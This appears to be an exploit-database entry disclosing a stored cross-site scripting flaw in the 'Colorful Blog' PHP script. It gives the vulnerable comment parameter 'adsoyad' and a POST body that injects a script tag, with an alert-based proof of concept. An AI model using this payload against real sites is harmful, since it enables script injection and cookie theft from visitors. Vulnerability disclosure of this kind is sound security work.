Colorful Blog - Persistent Cross-Site Scripting



EKU-ID: 44800 CVE: OSVDB-ID:
Author: Besim Published: 2016-10-13 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title : ----------- : Colorful Blog - Stored Cross Site Scripting
# Author : -----------------  : Besim
# Google Dork : ---------  :    -
# Date : -------------------- : 13/10/2016
# Type : -------------------- : webapps
# Platform : --------------- : PHP
# Vendor Homepage :-- : -
# Software link : --------- : http://wmscripti.com/php-scriptler/colorful-blog-scripti.html


Description :

# Vulnerable link : http://site_name/path/single.php?kat=kat&url='post_name'

*-*-*-*-*-*-*-*-* Stored XSS Payload *-*-*-*-*-*-*-*-*

*-* Vulnerable URL : http://site_name/path/single.php?kat=kat&url='post_name'    ---   Post comment section
*-* Vuln. Parameter : adsoyad
*-* POST DATA        :  adsoyad=<script>alert('document.cookie')</script>&email=besim@yopmail.com&web=example.com&mesaj=Nice, blog post